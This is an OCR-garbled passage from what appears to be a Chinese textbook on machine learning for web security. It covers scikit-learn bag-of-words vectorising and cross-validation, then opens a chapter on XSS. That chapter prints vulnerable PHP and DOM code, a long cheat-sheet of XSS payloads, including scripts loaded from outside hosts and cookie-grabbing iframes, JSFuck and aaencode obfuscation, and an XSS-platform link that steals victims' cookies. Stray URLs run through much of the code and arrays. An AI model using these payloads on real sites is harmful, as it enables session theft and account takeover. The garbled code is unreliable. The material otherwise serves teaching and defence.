实例 化 分 词 对象 : 








>>> vectorizer = CountVectorizer (min df-1) 

>>> vectorizer 

CountVectorizer (analyzer-http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...'word', binary-False, decode error-http://ww 
dtype-«http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'numpy.int64'», encoding-http://www.hzcourse.com/resource 
lowercase-True, max df-1.0, max features-None, min df-1, 

ngram range-(1, 1), preprocessor-None, stop words-None, 

strip accents-None, token pattern-http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...' (?u) \\b\\w\\wt\\b', 
tokenizer-None, vocabulary=None) 
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将 文本 进行 词 袋 处 理 : 





>>> corpus = [ 





































































































































































































http://www. hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'This is the first document.', 

http://www. hzcourse.com/resource/readBook?path=/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'This is the second second document.', 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'And the third one.', 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'Is this the first document?', 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... ] 

>>> X = vectorizer.fit transform(corpus) 

>>> X i 

«4x9 sparse matrix of type '«http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'numpy.int64'»' 
with 19 stored elements in Compressed Sparse http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... format» 

获取 对 应 的 特征 名 称 : 

>>> vectorizer.get feature names() == ( 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... ['and', 'document', 'first', 'is', 'one', 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 'second', 'the', 'third', 'this']) 

True 





获取 词 袋 数据 ， 至 此 我 们 已 经 完成 了 词 袋 化 。 但 是 对 于 程序 中 的 其 他 文本 ， 如 何 使 用 现 有 的 词 袋 的 特征 进行 向 量化 呢 ? 





>>> X.toarray() 





























array([[0, Ty Ly , 0, 0, Ly 0, l; 
[0, ly 0, I, 0, 2, Lp 0, Lll 
[1, 0, 0, 0, 1, 0, 1; 1, 0], 
[0, 1, 1, 1, 0, 0, 1, 0, 1]]http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/...) 




















我 们 定义 词 袋 的 特征 空间 叫做 词汇 表 vocabulary: 


vocabulary-vectorizer.vocabulary _ 





针对 其 他 文本 进行 词 袋 处 理 时 ， 可 以 直接 使 用 现 有 的 词汇 表 : 





>>> new vectorizer = CountVectorizer (min df-1, vocabulary-vocabulary) 








TensorFlow 中 有 类 似 实 现 : 








from sklearn.feature extraction.text import CountVectorizer 

MAX DOCUMENT LENGTH = 100 

vocab processor = 

learn.preprocessing.VocabularyProcessor (MAX DOCUMENT LENGTH) 

x train = np.array (list (vocab processor.fit transform(x train) ) ) 


x test = np.array(list (vocab processor.transform(x test) )) 





















































3.3.3 ”数据 读 取 


平时 处 理 数 据 时 ，CSV 是 最 常见 的 格式 ， 文 件 的 每 行 记录 一 个 向 量 ， 其 中 最 后 一 列 为 标记 。TensorFlow 提 供 了 非常 便捷 的 方式 从 CSV 文 件 中 读 取 数 据 集 。 


加 载 对 应 的 函数 库 : 











import tensorflow as tf 
import numpy as np 





从 CSV 文 件 中 读 取 数据 : 








training set = tf.contrib.learn.datasets.base.load csv with header( 
filename-" iris training.csv", aS > 

target dtype=np.int, 
features dtype-np.float32) 

feature columns = [tf.contrib.layers.real valued column("", dimension-4)] 





























其 中 各 个 参数 定义 为 : 

: filename, X £F £; 

: target dtype, i6 ZEE AE; 

. features_dtype， 特 征 数据 类 型 。 

访问 数据 集合 的 特征 以 及 标记 的 方式 为 : 


.data 
.target 


x-training se! 
y-training se! 











34 ”效果 验证 


效果 验证 是 机 器 学 习 非 常 重要 的 一 个 环节 ， 最 常 使 用 的 是 交叉 验证 。 常 见 的 验证 过 程 如 图 3-15 所 示 。 以 SVM 为 例 ， 导 入 SVM 库 以 及 Scikit-Learn 自 带 的 样本 库 datasets: 





>>> import numpy as np 

>>> from sklearn.model selection import train test split 
>>> from sklearn import datasets 

>>> from sklearn import svm 




















获取 样本 数据 : 


>>> iris = datasets.load iris() 
>>> iris.data.shape, iris.target.shape 
((150, 4), (150,)) 





为 了 保证 效果 ， 使 用 函数 train_test_spli 随 机 分 割 样本 为 训练 样本 和 测试 样本 : 


>>> X train, X test, y train, y test = train test split( 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... iris.data, iris.target, test size-0.4, random state-0) 
>>> X train.shape, y train.shape 

((90, 4), (90,)) 

>>> X test.shape, y test.shape 

((60, 4), (60,)) 











调用 SVM 进行 训练 : 


>>> clf = svm.SVC(kernel-'linear', C-1).fit(X train, y train) 














判断 预测 结果 与 测试 样本 标记 的 结果 ， 得 到 准确 率 : 


>>> clf.score(X test, y test) 
0.96http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 














训练 数据 模型 训练 模型 数据 


测试 数据 评估 结果 


图 3-15 ”常见 验证 过 程 


为 了 提高 验证 的 准确 度 ， 比 较 常 见 的 方法 是 使 用 K 折 交叉 验证 。 所 谓 K 折 交叉 验证 ， 就 是 初始 采样 分 割 成 K 个 子 样本 ， 一 个 单独 的 子 样本 被 保留 作为 验证 模型 的 数据 ， 其 他 K-1 个 样本 用 来 训练 。 交 叉 验证 
重复 K 次 ， 每 个 子 样本 验证 一 次 ,平均 K 次 的 结果 或 者 使 用 其 他 结合 方式 ， 最 终 得 到 一 个 单一 估 测 。 三 折 交 又 验证 原理 图 见 图 3-16。 这 个 方法 的 优势 在 于 ， 同 时 重复 运用 随机 产生 的 子 样本 进行 训练 和 验证 ， 
每 次 的 结果 验证 一 次 ， 十 折 交 叉 验证 是 最 常用 的 。 还 是 上 面 的 例子 ， 十 折 交 叉 验 证 实现 如 下 : 


>>> from sklearn.model selection import cross val score 

>>> clf = svm.SVC(kernel-'linear', C=1) 

>>> scores = cross val Score (cli, iris.data, iris.target, cv=5) 

>>> scores 

array([ 0.96http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/..., 1. http://www.hzcourse.com/resource/readBook?path-/or 


























训练 数据 测试 数据 





He 








训练 数据 





图 3-16 ”三 折 交 又 验 证 原理 图 


3.5 ”本章 小 结 


本 章 在 一 定 程度 上 科普 了 机 器 学 习 的 常见 概念 ， 并 介绍 了 后 面 章 节 将 频繁 使 用 的 一 些 知 名 数据 集 ， 我 们 在 后 面 章节 将 频繁 和 这 些 数据 打交道 。 本 章 并 没有 详细 讲解 各 种 概念 的 定义 ， 如 果 对 机 器 学 习 的 


基本 概念 还 是 很 模糊 ， 也 没有 关系 ， 通 过 后 面 章节 的 学 习 ， 我 们 会 不 断 加 深 对 这 些 概念 的 理解 。 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
: http://kdd.ics.uci.edu/ databases/kddcup99/kddcup99.html 


: http://blog.csdn.net/com stu zhang/atticle/details/6987632 














- http: //www.isi.csic.es /dataset/ 


- http://www.schonlau.net 
: http:/ /www.fx361.com/page/2016/1018/284843.shtml 
- http://www.freebuf.com/articles/system/97703.html 
: http://yann.lecun.com/exdb/mnist/ 
- http://www.cs.cornell.edu/People/pabo/movie-review-data/ 
: http://archive.ics.uci.edu/ml/datasets/Spambase 
: http:/ /www2.aueb.gr/usets/ion/data/enron-spam/ 
还 有 一 些 参考 文献 值得 一 读 : 


[1] R Lippmann, JW Haines, DJ Fried, J Korba, K Das.Analysis and Results of the The 1999 DARPA Off-Line Intrusion Detection Evaluation. International Symposium on Recent Advances in Intrusion 


Detection, 2000, 34 (4) : 162-182. 


[2] J McHugh.Testing Intrusion Detection Systems: A Critique of the 1998 and 1999 DARPA Intrusion Detection System Evaluations as Performed by Lincoln Laboratory. ACM Transactions on Information&System 


Security, 2000, 3 (4) : 262-294. 
[3] Schonlau M, Couper M.Semi-Automated Categorization of Open-Ended Questions.Survey Research Methods, August 2016. 


[4] KAH, PAR, WAR Ml ACJEJEKDD CUP99 研 究 四 .计算 机 工程 与 设计 ，2010，22 


第 4 章 ”Web 安全 基础 


本 章 将 梳理 一 下 常见 的 Web 安 全 问题 ， 为 后 续 的 机 器 学 习 应 用 打 好 基础 。 包 括 : XSS 攻 击 的 概念 、 危 害 、 分 类 、 常 见 的 攻击 方式 、 攻 击 载荷 以 及 特殊 的 攻击 变种 和 XSS 平 台 等 ，SQL 注 入 攻击 的 常见 自动 
化 攻击 工具 以 及 近年 典型 的 几 起 SQL 注入 攻击 事件 ，WebShel 的 危害、 功能 以 及 常见 类 型 ， 僵 尸 网 络 的 概念 、 形 成 、 危 害 以 及 近 几 年 典型 的 僵尸 网 络 攻击 事件 。 强 烈 建议 读者 借 此 机 会 重 温 相 关 基 础 知识 。 


4.1 XSS 攻 击 概 述 


XSS (Cross Site Scripting， 跨 站 脚本 攻击 ) ， 为 不 和 和 CSS (Cascading Style Sheets, RPE) 的 缩写 混淆 ， 故 将 跨 站 脚本 攻击 缩写 为 XSS。XSs 是 一 种 经 常 出 现在 Web 应 用 中 的 计算 机 安全 漏 
洞 ， 它 允许 恶意 Web 用 户 将 代码 植 入 到 提供 给 其 他 用 户 使 用 的 页 面 中 。 比 如 ， 这 些 代码 包括 HTML 代 码 和 客户 端 肢 本。 攻击 者 利用 XSS 漏 洞 旁 路 掉 访 问 控制 ， 例 如 同 源 策略 。 这 种 类 型 的 漏洞 由 于 被 黑客 用 
来 编写 危害 性 更 大 的 网 络 钓鱼 攻击 而 变 得 广为人知 。 对 于 跨 站 脚本 攻击 ， 黑 客 界 共识 是 : 跨 站 脚本 攻击 是 新 型 的 “缓冲 区 溢出 攻击 ”， 而 JavaScript 是 新 型 的 “ShellCode” , 


据 360 发 布 的 《2016 年 中 国 网 站 安全 漏洞 形势 分 析 报 告 》 披 露 ( 见 图 4-1) ,XSS 高 居 国 内 Web 漏 洞 前 三 。 


根据 乌云 统计 的 2016 年 的 安全 漏洞 ( 见 图 4-2) ，XSs 攻 击 十 分 活跃 。 


2016fFpog siis; 268253 th ( 扫 摘 检测 ) 


应 用 程序 错误 信息 
异常 页 面 导 致 服务 器 路 径 泄 漏 
跨 站 脚本 攻击 漏洞 
SQL 注入 漏洞 
发 现 目 录 启 用 了 自动 目录 列表 功能 
发 现 敏感 名 称 的 目录 漏洞 

IIS 短 文件 名 泄露 泼 洞 

a WEB 服务 器 启用 了 OPTIONS 方 法 
发 现 robots ,txt 文件 
Mysql 可 远程 连接 


19.896 — 


g 360mm 360folió 1 (8) 习 6O 互 联网 安全 中 心 


webscan.360 cn wangzhan.360.com 





图 4-1 2016 年 中 国 网 站 安全 漏洞 形势 分 析 报 告 


不 限 ~ | xss 


总 共 搜索 到 3339 条 结果 ， 显示 第 1 - 10 记录 


ID 发 布 时 间 标题 

wooyun-2016-0213359 ^ 2016-05-27 APP 安 全 之 趣 网 APP 存 在 XSS 与 SQL 注入 漏洞 
wooyun-2016-0205729 2016-05-11 APP 安 全 之 鱼 泡 泡 无 效 xss 杀 入 俩 后 台 系 统 操控 80 万 用 户 
wooyun-2016-0206756 2016-05-09 暴风 墨镜 某 站 存储 型 xss 漏 洞 可 获取 超级 管理 员 权 限 
wooyun-2016-0205124 2016-05-05 腾讯 又 一 XSS 被 广泛 用 于 黑 产 

wooyun-2016-0204957 2016-05-04 暴风 魔 镜 多 处 漏 润 打包 { 撞 库 /xss/Getshell) 
wooyun-2016-0202695 2016-05-03 discuz 某 插件 漏洞 导致 qq 域名 xss 


wooyun-2016-0204614 2016-05-03 新 浪 某 地 区 分 站 Flash 逆 向 分 析 存 安全 隐患 可 进行 XSS 利 用 


wooyun-2016-0204481 2016-05-03 我 是 如 何 利用 组 合 拳 一 步 步 攻 陷 匹 克 内 网 的 (XSS 配 合 CSRF/ 利 用 DNS 配合 SQL 注入 获取 数据 等 等 ) 


wooyun-2016-0203147 2016-04-28 APP 安 全 之 朋友 印象 一 处 无 效 xss 爆 破 导致 www 后 台 被 登录 (100 万 设备 /150 万 用 户 /1000 万 微 信 用 户 /核心 功能 可 修改 用 户 密码 


wooyun-2016-0202784 2016-04-27 点 开 我 的 链接 就 上 了 你 的 QQ mail (3Exss) 





图 4-2 ”2016 年 乌云 漏洞 平台 XSS 攻 击 举例 
XSS 的 危害 : 
t 盗 取 各 类 用 户 账号 ， 如 机 器 登录 账号 、 用 户 网 银 账号 、 各 类 管理 员 账 号 ; 
控制 企业 数据 ， 包 括 读 取 、 短 改 、 添 如、 删除 企业 敏感 数据 的 能 力 ; 
“ 盗窃 企业 重要 的 具有 商业 价值 的 资料 ; 
t 非法 转账 ; 
强制 发 送 电子 邮件 ; 
网 站 挂 马 ; 


+ 控制 受害 者 机 器 向 其 他 网 站 发 起 攻击 。 


44.1 XSS 的 分 类 


1. 反 射 型 XSS 
反射 型 XSS 也 被 称 为 非 持久 性 XSS， 是 现在 最 常见 的 一 种 XSS 漏 洞 。XSS 的 Payload 一 般 写 在 URL 中 ， 之 后 设法 让 被 害 者 点 击 这 个 链接 。 
假设 后 端 代码 为 : 


<?php 
$username = $ GET['username']; 
echo Susername; 

?> 





XSS 攻 击 对 应 链接 为 : 





http://xi.baidu.com?username=<script>alert (/xss/)«/script» 


2. 存 储 型 XSS 


存储 型 XSS 又 称 为 持久 型 XSS， 和 存储 型 XSS 是 最 危险 的 一 种 跨 站 脚本 。 存 储 型 XSS 被 服务 器 端 接收 并 存储 ， 当 用 户 访 问 该 网 页 时 ， 这 段 XSS 代 码 被 读 出 来 响应 给 浏览 器 。 反 射 型 XSS 与 DOM 型 XSS 都 必须 
依靠 用 户 手动 触发 ， 而 存储 型 XSs 却 不 需要 。 


测试 步骤 如 下 ， 以 留言 板 为 例 : 
步骤 1 添加 正常 的 留言 ， 使 用 Firebug 快 速 寻找 显示 标签 。 


步骤 2 判断 内 容 输出 (显示 ) 的 地 方 是 在 标签 内 还 是 在 标签 属性 内 ， 或 者 在 其 他 地 方 。 如 果 显 示 区 域 不 在 HTML 属 性 内 ， 则 可 以 直接 使 用 XSs 代 码 注入 。 如 果 在 属性 内 ， 需 要 先 闭合 标签 再 写 入 XSS 代 
码 。 如 果 不 能 得 知 内 容 输出 的 具体 位 置 ， 则 可 以 使 用 模糊 测试 方案 。 


步骤 3 在 插入 XSS Payload 代 码 后 ， 重 新 加 载 留言 页 面 ，X9S 代 码 被 浏览 器 执行 。 
3.DOM 型 XSS 


DOM 的 全 称 为 Document Object Model， 即 文档 对 象 模型 。 基 于 DOM 型 的 XSS 是 不 需要 与 服务 器 交互 的 ， 它 只 发 生 在 客户 端 处 理 数据 阶段 。 简 单 理解 DOM XSS 就 是 出 现在 JavaScript 代 码 中 的 XSS 
漏洞 。 


假设 存在 DOM Xss 漏 洞 的 前 端 代码 如 下 : 


«script» 
var temp = document.URL; 
var index = document.URL.indexOf ("content=") +4; 
var par = temp.substring (index); 
document.write (decodeURI (par) ) ; 
</script> 














如 果 输 入 如 下 链接 就 会 产生 XSs 漏 洞 : 


http://xi.baidu.com?content=<script>alert (/xss/)«/script» 





这 种 利用 也 需要 受害 者 点 击 链接 来 触发 ，DOM 型 XSS 是 前 端 代码 中 存在 了 漏洞 ， 而 反射 型 XSS 是 后 端 代码 中 存在 了 漏洞 。 反 射 型 和 存储 型 XSS 是 服务 器 端 代码 漏洞 造成 的 ，Payload 在 响应 页 面 中 ， 在 
DOM 型 XSS 中 ，Payload 不 在 服务 器 发 出 的 HTTP 响 应 页 面 中 ， 当 客户 端 脚本 运行 时 ( 泻 染 页 面 时 ) ，Payload 才 会 加 载 到 脚本 中 执行 。 


常见 XSS 攻 击 方式 如 下 。 


- 普通 的 XSS JavaScript 注 入 : 


«SCRIPT SRC-http://xi.baidu.com/XSS/xss.js»«/SCRIPT» 











: IMG#R AEXSSA& Jf] JavaScript ép 4 : 


<SCRIPT SRC-http://xi.baidu.com/XSS/xss.js»«/SCRIPT» 











| IMG 标 签 无 分 号 无 引号 : 





<IMG SRC-javascript:alert('XSS')» 





 IMG 标 签 大 小 写 不 敏感 : 








«IMG SRC=JaVaScRiPt:alert ('XSS')> 


-HTML 编码 (必须 有 分 号 ) 








«IMG SRC-javascript:alert ("XSS")> 


正 缺 陷 IMG 标 签 : 


<IMG """><SCRIPT>alert ("XSS") </SCRIPT>"> 











- formCharCode 标 签 (计算 器 ) 











«IMG SRC=javascript:alert (String.fromCharCode (88,83,83))» 





` 十 六 进 制 编码 : 


<IMG SRC=&#x6A&#x61&#x765#x6lhttp://www.hzcourse.com/resource/readi 











Book?path-/openresources/teach ebook/uncompressed/16472/0E 





ra 





BPS/Text/..@lghttp: //www.hzcourse.com/resource/read 








CHR AUR AR, JavaScript: 


«IMG SRC="jav ascript:alert ('XSS');"> 








“ 谱 入 式 编码 标 签 ， 将 JavaScript 分 开 : 


«IMG SRC="Jav ascript:alert ('XSS');"> 











«IMG SRC="Jav ascript:alert('XSS');"» 





CREAN AULA: 





«IMG SRC-2"jav ascript:alert ('XSS');"> 





. 嵌入 式 多 行 注入 JavaSctipt， 这 是 XSS 极 端的 例子 : 








«IMG SRC="Javascript:alert ('XSS')"> 


RIG SA (LR RH) 


<script>z='document. '</script> 
<script>z=zt+'write ("'</script> 
<script>z=zt+'<script'</script> 
<script>z=z+' src-ht'«/script» 
<script>z=zt+'tp://ww'</script> 
<script>z=zt+'w.shell'</script> 
<script>z=zt+'.net/1.'</script> 
<script>z=z+'js></sc'</script> 
<script>z=zt+'ript>") '</script> 
«script»eval r(z)</script> 

















- Spaces 和 meta 前 的 IMG 标 签 : 








«SCRI 


Non-alpha-non-digit XSS : 





<IMG SRC=" javascript:alert('XSS');"» 





[PT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT> 


: Non-alpha-non-digit XSS to 2: 


<BODY onload! #$%& () *~+-_.,:7?@[/|\]* > -alert ("XSS") > 


: Non-alpha-non-digit XSS to 3: 


<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT> 


<<SCRI 





双开 括号 : 








[PT>alert ("XSS") ; //««/SCRIPT» 





. 无 结束 脚本 标记 ( 仅 火 狐 等 浏览 器 ) 


<SCRIPT SRC=http://3w.org 





/XSS/xss .js?<B> 





. 无 结束 脚本 标记 2: 


«SCRI 





[PT SRC=//3w.org/XSS/xss.js> 


- 半 开 的 HTMILVJavaScript XSS: 





双开 角 括 号 : 


«IMG SRC-2"javascript:alert('XSS')" 





NU 





iframe src-http://3w.org 


FRAG it HE hg JavaScript: 


;alert('XSS!);// 


“ 结束 Title 标 签 : 





/XSS.html < 


</TITLE><SCRIPT>alert ("XSS") ;</SCRIPT> 





«BODY |] 














Input Image: 


BODY Image: 





BODY 标 签 : 


«BODY ('XSS')» 





<INPUT SRC="javascript:alert ('XSS');"> 


BACKGROUND="Jjavascript:alert ('XSS') "> 











IMG Dynsrc: 


IMG Lowstc: 


BGSOUND: 


<IMG DYNSRC-"javascript:alert('XSS')"» 


<IMG LOWSRC-"javascript:alert('XSS')"» 





<BGSOUND SRC="Javascript:alert ('XSS') ;"> 


STYLE sheet: 














<L 


INK REL="Stylesheet" HRI 


NK REL="stylesheet" HRI 


远程 样式 表 : 














EF-"javascript:alert('XS$');"» 


EF="http://3w.org/xss.css"> 


* List-style-image (列表 式 ) : 

















<STYLE>1i {list-style-image: url ("javascript:alert ('XSS')") ; }</STYLE><UL><LI>XSS 
y 


: IMG VBscript: 





<IMG SRC='vbscript :msgbox ("XSS") '></STYLE><UL><LI>XSS 














-META 链接 utl: 








«META HTTP-EQUIV-"refresh" CONTENT-"0; 
URL=http://;URL=javascript:alert ('XSS') ;"> 




















: Iframe: 








<IFRAME SRC-"javascript:alert('XSS');"»«/IFRAME» 




















: Frame: 

















XFRAMESET»«FRAME SRC="Javascript:alert ('XSS') ;"></FRAMESET>12-7-1 TOOLS - Powered by Discuz! Board 
https://www.t00ls.net/viewthread.php?action-printable&tid-15267 3/6 
































<TABLE BACKGROUND-"javascript:alert('XSS')"» 














- TD: 








<TABLE><TD BACKGROUND-"javascript:alert('XSS')"» 














: DIV background-image : 














<DIV STYLE-"background-image: url (javascript:alert('XSS'))"> 





: DIV expression: 








<DIV STYLE-"width: expression r(alert('XSS'));"> 














. STYLEA DIR: 














<IMG STYLE="xss:expression r (alert ('XSS'))"> 


- 匿名 STYLE (组 成 : 开 角 号 和 一 个 字母 开头 ) : 


<XSS STYLE-"xss:expression r(alert('XSS'))"» 








: STYLE background-image : 





«STYLE» .XSS(background-image:url ("javascript:alert('XSS')"); }</STYLE><A 
CLASS=XSS></A> 








: STYLE background: 





<STYLE><STYLE> 
type="text/css">BODY {background:url ("javascript:alert ('XSS')") }</STYLE> 

















- 使 用 BASE 标 签 : 




















«BASE HREF-"javascript:alert('XSS');//"» 


CIMGHEN AURA, TIUTESEqS 





«IMG SRC-"http://www.XXX.com/a.php?a-b"» 





-IMGRAAPS (ajpg 在 同 服务 器 ) : 


Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser 


CAS RE: 





<SCRIPT a-"»" SRC="http://3w.org/xss.js"></SCRIPT> 





- URL 4T: 


<A HREF="http://127.0.0.1/">XSS</A> 








: URLZg 3: 


«A HREF="http://3w.org">XSS</A> 








- IP ES): 


«A HREF="http://3232235521">XSS</A> 








<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A> 








- IPA: 





<A HREF="http://0300.0250.0000.0001">XSS</A> 








<A HREF="h 
tt p://6 6.000146.0x7.147/"">XSS</A> 





节省 [http:] : 


<A HREF="//www.google.com/">XSS</A> 





828 [www]: 


«A HREF="http://google.com/">XSS</A> 





: JavaScript Ze 4£ : 





<A HREF-"javascript:document.location-'http://www.google.com/'"»XSS«/A» 








常见 XSS 攻 击 载 荷 : 








<IMG SRC-x ontoggle="alert (String.fromCharCode (88, 83,83))"> 
«IMG SRC-x onload-"alert (String.fromCharCode (88,83,83))"» 

<INPUT TYPE-"BUTTON" action="alert ('XSS')"/> 

1 RC="Javascript:alert ('XSS') ;"></IFRAME>">123</h1> 

RC=# onmouseover="alert (document. cookie) "></IFRAME>123</h1> 






































"><h1><IFRAME 

"><h1><IFRAME 

<IFRAME SRC="jJavascript:alert ('XSS') ;"></IFRAME> 

<IFRAME SRC=# onmouseover="alert (document.cookie) "></IFRAME> 
FRAME SRC=# onmouseover="alert (document .cookie) "></IFRAME>123</h1> 
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4.1.2 XSS 特 殊 攻 击 方 式 


目前 已 经 出 现 了 利用 js 的 特性 进行 特殊 编码 变形 绕 过 防御 的 手段 ， 举 例如 下 。 
1.Jsfuck 


Jsfuck 可 以 针对 常见 的 js 函数 、 语 法 进行 编码 转换 : 






































False => ![] 

True => 1!1[] 

Undefined => [][[]] 

Nan => +[![]] 

0 => +[] 

1 => +!+[] 

2 => !+[]+!+[] 

10 => [+!+[]]+[+(]] 

Array => ([] 

Number => 十 [] 

String => []+[] 

Boolean => ![] 

Function => []["filter"] 

Eval => []["filter"] ["constructor"] ( code ) () 
Window => []["filter"] ["constructor"] ("return this") () 























以 常见 的 攻击 载荷 alert (/1/) 为 例 : 





alert (/1/) 


编码 后 内 容 如 图 4-3 所 示 。 


人 @ www.jsfuck.com 


()+ 
[]! JSFuck 


JSFuck is an esoteric and educational programming style based on the 
atomic parts of JavaScript. It uses only six different characters to 
write and execute code. 


It does not depend on a browser, so you can even run it on Node.js. 


Use the form below to convert your own script. Uncheck "eval source" to 
get back a plain string. 


alert(/1/) Eval Source 


CIECIEPEED USEII* CE! + D. [*! *E])*L* E131] * CHE ]1* EDD E! *E]* ! *E]]* CH ! 
([J*ED U*E3]* CH 3 E)*ED E! *E)*! *E)*! * E) )* CH E] * ED E* ! E 232JE ETE E) *E 1) 
[*E3)* CET E3)*EJEE D U* ! E FCF E13] * CHL]* ED E! *E)*!*[E]))* COT LED I* 

[1)*CHI E) ED E! *E)*!*[)*!*E1])*CH H E)*ED E*! *L11)*E D E! * [D])*! * E])*!*E]]* 
GHETEEJECLE)*EDUSEI)* CIE + CLII CF ! *E])* E* E31 ]3* COLJ*ED Cet) ett 





(1)*CH E) ED EFE))* COH E)*ED E! * ED) *! *E)*! + E)* ED E*! *E 2] D U*! * 
[J*E*E33 ]* CEJEE I) *E DD CE ESOC HOUT ED E! *E)*!*[E)*!1*E))* CH! E)*E D A+ 
[1)*CHE)*ED E*!3 *E] FCEJEE 2) *ED E* E] ]5* CE]EC3 E])*E DD E*E 1 3* CE! E2]* E] 
LED Et! *E)*E* E13) * CHL)*ED E! *E)*! *[E]2]* CO'AIE]9*ED + + CH E)* ED EU! * 
[])*!*[]*1*[]]*CH ! E])*E)) E*! *E 12] * EDD CECE *E])*!*E]])* CHIIE ])*E D E* EL + 





1839 chars Run This 


图 4-3 Jsfuck 示 例 
2.Aaencode 
js 加 密 工 具 aaencode 把 js 转 为 文字 表情 符号 。 以 常见 的 攻击 载荷 alert (/1/) 为 例 : 


alert (/1/) 


编码 后 内 容 如 图 4-4 所 示 。 


^ > Q|Owt&ippuiaencodehtm 


“Wal m') JA [I V^ *[( 1 02(7) =_=3; c2 (9) CZ C7 Y (I1) «(9)» (0^ ^0)/ (0^ ^o); R eCo: 7:(09 7223) +) 09 27 77:0 
w /« ' [o^ ^o -( ON A /AC 223) + 0 7 1; CR) E O =(C 9 7223) +) e^ ^o]; IL) e] = (C+ EC 7467 )-C 8 ) EC ID) C0] = (C24 C9 Y; 
(o )-C D) re] D) oso! 7 & 0 O H+ (Cw 7223)  ) C71 (CE) 8 (7208€ 7 8 (€ 7 2-3) + E O HE ==3) + (7) - CO 8C D) CC 
Is 0 7) 7€ CO Co1«( 7 ==3) +) C9 ECT) 07 =(0%.40) oto EC € )2( 7 223) +) (9 1 (03) 2 I 74( E) (C7) + C2 14( 7 ==3) 
+ [0% ^o ^ 6" JHC- ==3) +) C8 + (w 7 & C8 E (7) ( 8 Y CC € I= C07 9 72 ( IE "7 o^ ^o -( 9 Dilo 7 ojat 7 «' E^ ^o I) C 
OM CMCC mit A oA el oO) -OH(A eo ) (oN) eH) )+( . 
€ )« ( IE € 1*( 9 )+ (^. ^0) «(^ ^o))« ((0^. ^o) - CO D+ (A € 14( © )+ (0^ ^o) Horno (7 )« (IC € 14( 7) + (9) (e^o ( DC EHE) 
ns (C7 ) + (0^.^o))* C C € 1«((0^ ^0) «(0^ ^o)* ( 6€ )« C BU € HC) + C9 )« (€ 7) + (0^: ^op« CC e HC) + Ce »«Ce ) (Ga rone 





图 4-4 aaencode7 f/] 


4.4.3 XSS 平 台 简 介 


目前 市 面 上 有 大 量 的 XSs 平 台 ， 自 动 生成 js 攻击 载荷 ， 大 大 减 小 了 攻击 难度 ， 主 要 步骤 如 下 : 

` 注册 XSS 平 台 账 户 ; 

- 获得 XSS 攻 击 代 码 ， 主 要 功能 是 获取 用 户 cookie、ua、ip 等 信息 : 

http://webxss.top/xss/9C6YSs?1483513692 

* 结合 XSS 漏 洞 构造 恶意 链接 : 
http://testdomain.com/wavsep/active/Reflected-XSS/RXSS-Detection-Evaluation-GET/Case01-Tag2HtmlPageScope.jsp?userinput=<script%20src="http://webxss.top/xss/9C6YSs?148092496"></ 


恶意 代码 将 注入 到 回 显 页 面 中 ， 当 用 户 访问 该 页 面 时 ， 恶 意 代码 将 执行 ， 受 害 者 在 testdomain.com 下 的 cookie 将 被 获取 ， 黑 客 随即 可 获得 受害 者 在 这 个 域 下 的 权限 ， 见 图 4-5。 比 较 常 见 的 做 法 是 通过 
钓鱼 邮件 、im 消 息 等 方式 诱骗 受害 者 点 击 。 


« location : http.//180.76.166.222:8080/wa «+ HTTP REFERER : http//180.76.166.222: P% 
vsep/active/Reflected-XSS/RXSS-Detect 8080/wavsep/active/Reflected-XSS/RXS 
ion-Evaluation-GET/CaseO0! -Tag2HtmiPa S-Detection-Evaluation-GET/Case01-Ta 
geScope jsp?userninput-«script9620src- 
http-//webxss.top/xss/9C6YSs? 1480924 
966></script> Ss? 14809249664gt-Sit/scripté.gt; 

« toplocation : nttp://180.76, 166.222:808 « HTTP USER AGENT : Mozilla/5.0 (Wind 
O/wavsep/active/Reflected-XSS/RXSS-D ows NT 6.3; WOW64; Trident/7 .0; rv:11. 
etection-Evaluation-GET/Case01-Tag2Ht 0) like Gecko 

+ REMOTE_ADDR: 


c REA ee 





E4-5 XSS 平 台 上 记录 获取 的 信息 





2016 年 雅虎 邮箱 ( 见 图 4-6) 被 报 具有 XSs 漏 洞 ， 黑 客 利 用 该 漏洞 能 直接 把 受害 者 的 收 件 内 容 转 发 到 外 部 网 站 ， 并 且 顺 带 有 蠕虫 扩散 的 功能 。 不 过 让 人 庆幸 的 是 ， 此 漏洞 在 互联 网 上 还 没有 大 面积 传播 之 
前 已 经 被 官方 修复 。 





图 4-6 ”雅虎 邮箱 
这 个 漏洞 影响 了 所 有 版 本 的 雅虎 Web 邮 箱 ， 但 移动 App 并 未 受 影响 。 气 报道， 雅虎 邮箱 是 全 球 第 二 大 电子 邮件 服务 商 ， 截 止 2014 年 2 月 ， 它 已 拥有 3 亿 客 户 。 


